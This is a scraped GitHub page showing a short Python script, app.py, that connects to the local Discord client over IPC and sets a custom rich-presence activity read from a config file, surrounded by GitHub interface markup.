tooltipped-nw js-remove-unless-platform" data-platforms="windows,mac" href="https://desktop.github.com" aria-label="Open this file in GitHub Desktop" data-ga-click="Repository, open with desktop"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-desktop"> <path fill-rule="evenodd" d="M1.75 2.5h12.5a.25.25 0 01.25.25v7.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25v-7.5a.25.25 0 01.25-.25zM14.25 1H1.75A1.75 1.75 0 000 2.75v7.5C0 11.216.784 12 1.75 12h3.727c-.1 1.041-.52 1.872-1.292 2.757A.75.75 0 004.75 16h6.5a.75.75 0 00.565-1.243c-.772-.885-1.193-1.716-1.292-2.757h3.727A1.75 1.75 0 0016 10.25v-7.5A1.75 1.75 0 0014.25 1zM9.018 12H6.982a5.72 5.72 0 01-.765 2.5h3.566a5.72 5.72 0 01-.765-2.5z"></path> </svg> </a> <remote-clipboard-copy class="d-inline-block btn-octicon" style="height: 26px" data-src="/agambajwa/discord-custom-activity/raw/master/app.py" data-action="click:remote-clipboard-copy <span data-target="remote-clipboard-copy.idle"> <span class="tooltipped tooltipped-nw cursor-pointer" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;COPY_RAW_CONTENTS_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="e53a27ab14298c3efe29c78eae6edddde764a5cc9397f6bfea195fd867c5ff40" aria-label="Copy raw contents"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 
16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path> </svg> </span></span> <span data-target="remote-clipboard-copy.fetching" hidden="hidden"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </span> <span data-target="remote-clipboard-copy.success" hidden="hidden"> <span class="tooltipped tooltipped-nw" aria-label="Copied!"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check color-text-success"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> </span> <span data-target="remote-clipboard-copy.error" hidden="hidden"> <span class="tooltipped tooltipped-nw" aria-label="Something went wrong. 
Try again."> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert color-text-warning"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> </span> </span> </remote-clipboard-copy> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="inline-form js-update-url-with-hash" action="/agambajwa/discord-custom-activity/edit/master/app.py" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="JNSPx4+edOJ4WuJlWAfZuhILKwlrsffHdo0azFAoNPLBRZkHQ1RfN4vEIE09btacItBs0wbIq0vJGRVkZ2ZA6g==" /> <button class="btn-octicon tooltipped tooltipped-nw" type="submit" aria-label="Fork this project and edit the file" data-hotkey="e" data-disable-with> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-pencil"> <path fill-rule="evenodd" d="M11.013 1.427a1.75 1.75 0 012.474 0l1.086 1.086a1.75 1.75 0 010 2.474l-8.61 8.61c-.21.21-.47.364-.756.445l-3.251.93a.75.75 0 01-.927-.928l.929-3.25a1.75 1.75 0 01.445-.758l8.61-8.61zm1.414 1.06a.25.25 0 00-.354 0L10.811 3.75l1.439 1.44 1.263-1.263a.25.25 0 000-.354l-1.086-1.086zM11.189 6.25L9.75 4.81l-6.286 6.287a.25.25 0 00-.064.108l-.558 1.953 1.953-.558a.249.249 0 00.108-.064l6.286-6.286z"></path> </svg> </button> </form> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="inline-form" action="/agambajwa/discord-custom-activity/delete/master/app.py" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="OibpDzLUKYX9Osb3BVKMD8HPENt+M/zePb/fqBW6lq6ti32WNXO3wezy3hLuFD24emiY+YaU6pw5iBs9SBCWqg==" /> 
<button class="btn-octicon btn-octicon-danger tooltipped tooltipped-nw" type="submit" aria-label="Fork this project and delete the file" data-disable-with> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-trash"> <path fill-rule="evenodd" d="M6.5 1.75a.25.25 0 01.25-.25h2.5a.25.25 0 01.25.25V3h-3V1.75zm4.5 0V3h2.25a.75.75 0 010 1.5H2.75a.75.75 0 010-1.5H5V1.75C5 .784 5.784 0 6.75 0h2.5C10.216 0 11 .784 11 1.75zM4.496 6.675a.75.75 0 10-1.492.15l.66 6.6A1.75 1.75 0 005.405 15h5.19c.9 0 1.652-.681 1.741-1.576l.66-6.6a.75.75 0 00-1.492-.149l-.66 6.6a.25.25 0 01-.249.225h-5.19a.25.25 0 01-.249-.225l-.66-6.6z"></path> </svg> </button> </form> </div> </div> <div class="d-flex hide-lg hide-xl flex-order-2 flex-grow-0"> <details class="dropdown details-reset details-overlay d-inline-block"> <summary class="btn-octicon" aria-haspopup="true" aria-label="possible actions"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path> </svg> </summary> <ul class="dropdown-menu dropdown-menu-sw" style="width: 175px"> <li> <a class="dropdown-item tooltipped tooltipped-nw js-remove-unless-platform" data-platforms="windows,mac" href="https://desktop.github.com" data-ga-click="Repository, open with desktop"> Open with Desktop </a> </li> <li> <a class="dropdown-item" href="/agambajwa/discord-custom-activity/raw/master/app.py"> View raw </a> </li> <li> <remote-clipboard-copy class="dropdown-item" data-src="/agambajwa/discord-custom-activity/raw/master/app.py" data-action="click:remote-clipboard-copy <span data-target="remote-clipboard-copy.idle"> <span class="cursor-pointer" 
data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;COPY_RAW_CONTENTS_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="e53a27ab14298c3efe29c78eae6edddde764a5cc9397f6bfea195fd867c5ff40"> Copy raw contents </span></span> <span data-target="remote-clipboard-copy.fetching" hidden="hidden"> Copy raw contents <span class="d-inline-block position-relative" style="top: 3px"> <svg aria-label="fetching contents…" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </span> </span> <span data-target="remote-clipboard-copy.success" hidden="hidden"> Copy raw contents <svg aria-label="Copied!" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check color-text-success"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <span data-target="remote-clipboard-copy.error" hidden="hidden"> Copy raw contents <svg aria-label="Something went wrong. Try again." 
role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert color-text-warning"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> </span> </remote-clipboard-copy> </li> <li> <a class="dropdown-item" href="/agambajwa/discord-custom-activity/blame/master/app.py"> View blame </a> </li> <li class="dropdown-divider" role="none"></li> <li> <a class="dropdown-item" href="/agambajwa/discord-custom-activity/edit/master/app.py">Edit file</a> </li> <li> <a class="dropdown-item menu-item-danger" href="/agambajwa/discord-custom-activity/delete/master/app.py">Delete file</a> </li> </ul> </details> </div> </div> <div itemprop="text" class="Box-body p-0 blob-wrapper data type-python gist-border-0"> <table class="highlight tab-size js-file-line-container" data-tab-size="8" data-paste-markdown-skip> <tr> <td id="L1" class="blob-num js-line-number" data-line-number="1"></td> <td id="LC1" class="blob-code blob-code-inner js-file-line"><span class=pl-k>from</span> <span class=pl-s1>discoIPC</span> <span class=pl-k>import</span> <span class=pl-s1>ipc</span></td> </tr> <tr> <td id="L2" class="blob-num js-line-number" data-line-number="2"></td> <td id="LC2" class="blob-code blob-code-inner js-file-line"><span class=pl-k>import</span> <span class=pl-s1>configparser</span></td> </tr> <tr> <td id="L3" class="blob-num js-line-number" data-line-number="3"></td> <td id="LC3" class="blob-code blob-code-inner js-file-line"><span class=pl-k>import</span> <span class=pl-s1>time</span></td> </tr> <tr> <td id="L4" class="blob-num js-line-number" data-line-number="4"></td> <td id="LC4" class="blob-code blob-code-inner js-file-line"> 
</td> </tr> <tr> <td id="L5" class="blob-num js-line-number" data-line-number="5"></td> <td id="LC5" class="blob-code blob-code-inner js-file-line"><span class=pl-s1>config</span> <span class=pl-c1>=</span> <span class=pl-s1>configparser</span>.<span class=pl-v>ConfigParser</span>()</td> </tr> <tr> <td id="L6" class="blob-num js-line-number" data-line-number="6"></td> <td id="LC6" class="blob-code blob-code-inner js-file-line"><span class=pl-s1>config</span>.<span class=pl-en>read</span>(<span class=pl-s>&#39;config.ini&#39;</span>)</td> </tr> <tr> <td id="L7" class="blob-num js-line-number" data-line-number="7"></td> <td id="LC7" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L8" class="blob-num js-line-number" data-line-number="8"></td> <td id="LC8" class="blob-code blob-code-inner js-file-line"><span class=pl-s1>base_activity</span> <span class=pl-c1>=</span> {</td> </tr> <tr> <td id="L9" class="blob-num js-line-number" data-line-number="9"></td> <td id="LC9" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;details&#39;</span>: <span class=pl-s>&#39;Custom details&#39;</span>,</td> </tr> <tr> <td id="L10" class="blob-num js-line-number" data-line-number="10"></td> <td id="LC10" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;state&#39;</span> : <span class=pl-s>&#39;Custom state&#39;</span>,</td> </tr> <tr> <td id="L11" class="blob-num js-line-number" data-line-number="11"></td> <td id="LC11" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;assets&#39;</span>: {</td> </tr> <tr> <td id="L12" class="blob-num js-line-number" data-line-number="12"></td> <td id="LC12" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;large_image&#39;</span>: <span class=pl-s>&#39;image_name&#39;</span>,</td> </tr> <tr> <td id="L13" class="blob-num js-line-number" data-line-number="13"></td> <td id="LC13" class="blob-code blob-code-inner js-file-line"> <span 
class=pl-s>&#39;large_text&#39;</span>: <span class=pl-s>&#39;Image text&#39;</span>,</td> </tr> <tr> <td id="L14" class="blob-num js-line-number" data-line-number="14"></td> <td id="LC14" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;small_image&#39;</span>: <span class=pl-s>&#39;small_image_name&#39;</span>,</td> </tr> <tr> <td id="L15" class="blob-num js-line-number" data-line-number="15"></td> <td id="LC15" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;small_text&#39;</span>: <span class=pl-s>&#39;Small image text&#39;</span></td> </tr> <tr> <td id="L16" class="blob-num js-line-number" data-line-number="16"></td> <td id="LC16" class="blob-code blob-code-inner js-file-line"> },</td> </tr> <tr> <td id="L17" class="blob-num js-line-number" data-line-number="17"></td> <td id="LC17" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;party&#39;</span>: {</td> </tr> <tr> <td id="L18" class="blob-num js-line-number" data-line-number="18"></td> <td id="LC18" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;size&#39;</span>: [<span class=pl-c1>1</span>, <span class=pl-c1>5</span>]</td> </tr> <tr> <td id="L19" class="blob-num js-line-number" data-line-number="19"></td> <td id="LC19" class="blob-code blob-code-inner js-file-line"> }</td> </tr> <tr> <td id="L20" class="blob-num js-line-number" data-line-number="20"></td> <td id="LC20" class="blob-code blob-code-inner js-file-line">}</td> </tr> <tr> <td id="L21" class="blob-num js-line-number" data-line-number="21"></td> <td id="LC21" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L22" class="blob-num js-line-number" data-line-number="22"></td> <td id="LC22" class="blob-code blob-code-inner js-file-line"><span class=pl-k>def</span> <span class=pl-en>main</span>():</td> </tr> <tr> <td id="L23" class="blob-num js-line-number" data-line-number="23"></td> <td id="LC23" class="blob-code blob-code-inner js-file-line"> 
<span class=pl-s1>client</span> <span class=pl-c1>=</span> <span class=pl-s1>ipc</span>.<span class=pl-v>DiscordIPC</span>(<span class=pl-s1>config</span>[<span class=pl-s>&#39;CLIENT&#39;</span>][<span class=pl-s>&#39;client_id&#39;</span>])</td> </tr> <tr> <td id="L24" class="blob-num js-line-number" data-line-number="24"></td> <td id="LC24" class="blob-code blob-code-inner js-file-line"> <span class=pl-c># Connect to Discord Client</span></td> </tr> <tr> <td id="L25" class="blob-num js-line-number" data-line-number="25"></td> <td id="LC25" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>client</span>.<span class=pl-en>connect</span>()</td> </tr> <tr> <td id="L26" class="blob-num js-line-number" data-line-number="26"></td> <td id="LC26" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L27" class="blob-num js-line-number" data-line-number="27"></td> <td id="LC27" class="blob-code blob-code-inner js-file-line"> <span class=pl-en>print</span>(<span class=pl-s>&#39;<span class=pl-cce>\n</span>Starting Custom Activity...<span class=pl-cce>\n</span>&#39;</span>)</td> </tr> <tr> <td id="L28" class="blob-num js-line-number" data-line-number="28"></td> <td id="LC28" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>time</span>.<span class=pl-en>sleep</span>(<span class=pl-c1>5</span>)</td> </tr> <tr> <td id="L29" class="blob-num js-line-number" data-line-number="29"></td> <td id="LC29" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L30" class="blob-num js-line-number" data-line-number="30"></td> <td id="LC30" class="blob-code blob-code-inner js-file-line"> <span class=pl-k>try</span>:</td> </tr> <tr> <td id="L31" class="blob-num js-line-number" data-line-number="31"></td> <td id="LC31" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>client</span>.<span class=pl-en>update_activity</span>(<span class=pl-en>set_activity</span>()) <span class=pl-c># Update 
Activity</span></td> </tr> <tr> <td id="L32" class="blob-num js-line-number" data-line-number="32"></td> <td id="LC32" class="blob-code blob-code-inner js-file-line"> <span class=pl-k>while</span> <span class=pl-c1>True</span>:</td> </tr> <tr> <td id="L33" class="blob-num js-line-number" data-line-number="33"></td> <td id="LC33" class="blob-code blob-code-inner js-file-line"> <span class=pl-en>input</span>(<span class=pl-s>&#39;<span class=pl-cce>\n</span>Connected! &#39;</span>)</td> </tr> <tr> <td id="L34" class="blob-num js-line-number" data-line-number="34"></td> <td id="LC34" class="blob-code blob-code-inner js-file-line"> <span class=pl-c># Do nothing </span></td> </tr> <tr> <td id="L35" class="blob-num js-line-number" data-line-number="35"></td> <td id="LC35" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L36" class="blob-num js-line-number" data-line-number="36"></td> <td id="LC36" class="blob-code blob-code-inner js-file-line"> <span class=pl-k>except</span> <span class=pl-v>KeyboardInterrupt</span>:</td> </tr> <tr> <td id="L37" class="blob-num js-line-number" data-line-number="37"></td> <td id="LC37" class="blob-code blob-code-inner js-file-line"> <span class=pl-en>print</span>(<span class=pl-s>&#39;Disconnecting...<span class=pl-cce>\n</span>&#39;</span>)</td> </tr> <tr> <td id="L38" class="blob-num js-line-number" data-line-number="38"></td> <td id="LC38" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>client</span>.<span class=pl-en>disconnect</span>()</td> </tr> <tr> <td id="L39" class="blob-num js-line-number" data-line-number="39"></td> <td id="LC39" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L40" class="blob-num js-line-number" data-line-number="40"></td> <td id="LC40" class="blob-code blob-code-inner js-file-line"><span class=pl-k>def</span> <span class=pl-en>set_activity</span>():</td> </tr> <tr> <td id="L41" class="blob-num js-line-number" data-line-number="41"></td> <td 
id="LC41" class="blob-code blob-code-inner js-file-line"> <span class=pl-c># Set acitivty for the player.</span></td> </tr> <tr> <td id="L42" class="blob-num js-line-number" data-line-number="42"></td> <td id="LC42" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>activity</span> <span class=pl-c1>=</span> <span class=pl-s1>base_activity</span></td> </tr> <tr> <td id="L43" class="blob-num js-line-number" data-line-number="43"></td> <td id="LC43" class="blob-code blob-code-inner js-file-line"> <span class=pl-k>return</span> <span class=pl-s1>activity</span></td> </tr> <tr> <td id="L44" class="blob-num js-line-number" data-line-number="44"></td> <td id="LC44" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L45" class="blob-num js-line-number" data-line-number="45"></td> <td id="LC45" class="blob-code blob-code-inner js-file-line"><span class=pl-k>if</span> <span class=pl-s1>__name__</span> <span class=pl-c1>==</span> <span class=pl-s>&#39;__main__&#39;</span>:</td> </tr> <tr> <td id="L46" class="blob-num js-line-number" data-line-number="46"></td> <td id="LC46" class="blob-code blob-code-inner js-file-line"> <span class=pl-en>main</span>()</td> </tr> </table> <details class="details-reset details-overlay BlobToolbar position-absolute js-file-line-actions dropdown d-none" aria-hidden="true"> <summary class="btn-octicon ml-0 px-2 p-0 color-bg-primary border color-border-tertiary rounded-1" aria-label="Inline file action toolbar"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path> </svg> </summary> <details-menu> <ul class="BlobToolbar-dropdown dropdown-menu dropdown-menu-se ml-2 mt-2" style="width:185px" > <li> <clipboard-copy role="menuitem" class="dropdown-item" id="js-copy-lines" 
style="cursor:pointer;" aria-label="Copy lines"> Copy lines </clipboard-copy> </li> <li> <clipboard-copy role="menuitem" class="dropdown-item" id="js-copy-permalink" style="cursor:pointer;" aria-label="Copy permalink"> Copy permalink </clipboard-copy> </li> <li><a class="dropdown-item js-update-url-with-hash" id="js-view-git-blame" role="menuitem" href="/agambajwa/discord-custom-activity/blame/9a6488f083af4b9c41113cffbb0b8e4356985c11/app.py">View git blame</a></li> <li><a class="dropdown-item" id="js-new-issue" role="menuitem" href="/agambajwa/discord-custom-activity/issues/new">Reference in new issue</a></li> </ul> </details-menu> </details> </div> </div> <details class="details-reset details-overlay details-overlay-dark" id="jumpto-line-details-dialog"> <summary data-hotkey="l" aria-label="Jump to line"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast linejump" aria-label="Jump to line"> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="js-jump-to-line-form Box-body d-flex" action="" accept-charset="UTF-8" method="get"> <input class="form-control flex-auto mr-3 linejump-input js-jump-to-line-field" type="text" placeholder="Jump to line&hellip;" aria-label="Jump to line" autofocus> <button data-close-dialog="" type="submit" data-view-component="true" class="btn"> Go </button> </form> </details-dialog> </details> <div class="Popover anim-scale-in js-tagsearch-popover" hidden data-tagsearch-url="/agambajwa/discord-custom-activity/find-definition" data-tagsearch-ref="master" data-tagsearch-path="app.py" data-tagsearch-lang="Python" 
data-hydro-click="{&quot;event_type&quot;:&quot;code_navigation.click_on_symbol&quot;,&quot;payload&quot;:{&quot;action&quot;:&quot;click_on_symbol&quot;,&quot;repository_id&quot;:298526344,&quot;ref&quot;:&quot;master&quot;,&quot;language&quot;:&quot;Python&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="0a8f6a41e955842b0be9a33175d7ebbdd2cb6543f0698dc9866704903cd61c36"> <div class="Popover-message Popover-message--large Popover-message--top-left TagsearchPopover mt-1 mb-4 mx-auto Box color-shadow-large"> <div class="TagsearchPopover-content js-tagsearch-popover-content overflow-auto" style="will-change:transform;"> </div> </div> </div> </div> </div> </div> </main> </div> </div> <div class="footer container-xl width-full p-responsive" role="contentinfo"> <div class="position-relative d-flex flex-row-reverse flex-lg-row flex-wrap flex-lg-nowrap flex-justify-center flex-lg-justify-between pt-6 pb-2 mt-6 f6 color-text-secondary border-top color-border-secondary "> <ul class="list-style-none d-flex flex-wrap col-12 col-lg-5 flex-justify-center flex-lg-justify-between mb-2 mb-lg-0"> <li class="mr-3 mr-lg-0">&copy; 2021 GitHub, Inc.</li> <li class="mr-3 mr-lg-0"><a href="https://docs.github.com/en/github/site-policy/github-terms-of-service" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to terms&quot;,&quot;label&quot;:&quot;text:terms&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="cad6f39ced678e86d7a5e96c023c0fa2c5891ec5b3616a49afcdaa21ee3d0c12">Terms</a></li> <li class="mr-3 mr-lg-0"><a href="https://docs.github.com/en/github/site-policy/github-privacy-statement" 
data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to privacy&quot;,&quot;label&quot;:&quot;text:privacy&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="263230e8c537a87a5634a289f54b032bfa6685a1a11a704bbf33de36a0553bab">Privacy</a></li> <li class="mr-3 mr-lg-0"><a data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to security&quot;,&quot;label&quot;:&quot;text:security&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="46892c668135bbb345714e41d8dd65b412a7bc1ac126e1104a21457b01280b3b" href="https://github.com/security">Security</a></li> <li class="mr-3 mr-lg-0"><a href="https://www.githubstatus.com/" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to status&quot;,&quot;label&quot;:&quot;text:status&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="850b1e9b63cf1369fce12635727170f159af2c820c10b435a1369da13f6a3b37">Status</a></li> <li><a data-ga-click="Footer, go to help, text:Docs" href="https://docs.github.com">Docs</a></li> </ul> <a aria-label="Homepage" title="GitHub" class="footer-octicon d-none d-lg-block mx-lg-4" href="https://github.com"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 
0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path> </svg> </a> <ul class="list-style-none d-flex flex-wrap col-12 col-lg-5 flex-justify-center flex-lg-justify-between mb-2 mb-lg-0"> <li class="mr-3 mr-lg-0"><a href="https://support.github.com?tags=dotcom-footer" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to contact&quot;,&quot;label&quot;:&quot;text:contact&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="ac4567556b973a5bf5d3c61161c07b927fab9772ddfb7e27055d611413f2acb4">Contact GitHub</a></li> <li class="mr-3 mr-lg-0"><a href="https://github.com/pricing" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to Pricing&quot;,&quot;label&quot;:&quot;text:Pricing&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="894887d6dd70a306a70bc2b360c5fc5e23117412d10a4253ebae837147aeab59">Pricing</a></li> <li class="mr-3 mr-lg-0"><a href="https://docs.github.com" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to 
api&quot;,&quot;label&quot;:&quot;text:api&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="78682afcd93486f1045fa60a8b86e5c164e42aa8441a136e07d508ea87437b6a">API</a></li> <li class="mr-3 mr-lg-0"><a href="https://services.github.com" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to training&quot;,&quot;label&quot;:&quot;text:training&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="7760f130353590dca4b2a6f009556a55c9558bb6cd58a07f3b606904080437a1">Training</a></li> <li class="mr-3 mr-lg-0"><a href="https://github.blog" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to blog&quot;,&quot;label&quot;:&quot;text:blog&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="bcabd5b32e60440ed8e25c81ce8fded52be950ccd0c53391aac6071ecf738b7c">Blog</a></li> <li><a data-ga-click="Footer, go to about, 